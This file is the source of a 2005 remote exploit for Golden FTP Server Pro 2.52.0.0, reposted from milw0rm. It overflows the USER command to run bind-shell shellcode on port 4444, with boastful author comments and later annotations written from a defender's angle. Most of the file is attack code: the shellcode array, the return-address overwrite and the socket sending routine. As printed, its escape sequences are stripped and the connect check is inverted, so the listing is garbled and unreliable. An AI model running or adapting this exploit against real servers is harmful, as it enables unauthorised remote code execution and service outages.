/*
golden ftp 2.52.0.0 remote r00t exploit
/
remote r00t exploit binds port 4444 on the remote machine.
/ tested on: winxp sp0 rus
/ simple stack overflow in golden ftpd.
if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)
/ for the code to be executed, the admin must restart or shut down ftpd... then ftpd will execute eviLDuDe'Z c0de )
/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
(c) uKt research '04/'05
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#define RETADDR 0x77F510B0
/*
 * Payload carried in the overflowing USER argument.  The author's comment
 * says it binds a listener on port 4444 on the target.  main() copies the
 * whole array, including the terminating NUL, to the front of the request
 * buffer with memcpy(data, &shellcode, sizeof(shellcode)).
 *
 * NOTE(review): in this listing the hex escapes appear as bare "x.." pairs,
 * i.e. the backslashes did not survive extraction; as printed the literal is
 * plain ASCII text rather than the byte sequence the author intended.
 */
char shellcode[]= // binds 4444 port
"xd9xEExd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe"
"x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7"
"xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb"
"xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e"
"x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a"
"xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb"
"xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea"
"x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad"
"x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30"
"x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21"
"xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15"
"xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6"
"xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38"
"x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8"
"x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1"
"xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2"
"xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6"
"x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1"
"x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36"
"x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0"
"x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1"
"xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9"
"xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c"
"x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4"
"xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d";
/*
 * Entry point: builds a single oversized FTP USER command and sends it to
 * the target given as argv[1] (ip) and argv[2] (port), then exits.
 *
 * Request layout as constructed below:
 *   data[0..371]    filled with 0x55; the remainder of data[] is zeroed
 *   data[332..335]  overwritten with RETADDR (4-byte write through a long*)
 *   data[0..]       then overwritten with the shellcode array (memcpy, NUL included)
 *   evil            "USER " + data + "rnPASSrn" (escape sequences lost in this listing)
 *
 * Defender's view: the observable on the wire is a USER argument several
 * hundred bytes long consisting of repeated 0x55 bytes plus mostly
 * non-printable payload data, which is straightforward to alert on at an
 * FTP proxy or IDS.  The product/version named by the author is Golden FTP
 * Server Pro 2.52.0.0 (see the banner below); the header comment also notes
 * the daemon crashes and fails to restart when the address is wrong, so an
 * unexpectedly crashed or restarting ftpd is itself an indicator.
 */
int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];   // data: overflow payload; evil: full FTP request line(s)
struct sockaddr_in addr;
printf("nn >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<n :: by darkeagle [unl0ck] ::n >> http://unl0ck.org <<nn");
WSAStartup(MAKEWORD(2,0), &wsa);   // Winsock 2.0; return value not checked
if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>nn", argv[0]);
exit(0);   // exits without WSACleanup()
}
printf(" [*] ip: %s, port: %dn", argv[1], atoi(argv[2]));
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));   // port parsed with atoi, no range validation
addr.sin_addr.s_addr = inet_addr(argv[1]);   // dotted-quad only; result not checked
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);   // result not checked
memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);   // 372-byte filler; the zeroed tail terminates the string
*(long*)&data[332] = RETADDR;   // overwrite at offset 332 (long is 32-bit on Win32)
memcpy(data, &shellcode, sizeof(shellcode));   // payload at the front, trailing NUL included
printf(" [`] connecting...n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connectedn"); } else { exit(0); }   // silent exit when the test fails
sprintf(evil, "USER %srnPASSrn", data);   // unbounded sprintf; data is NUL-terminated by the zeroed tail
Sleep(1000);
send(sock, evil, strlen(evil), 1);   // flags=1 is MSG_OOB on Winsock; return value not checked
printf(" [+] send. w8ing while ftpd will reboot...nn");
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2005-04-29]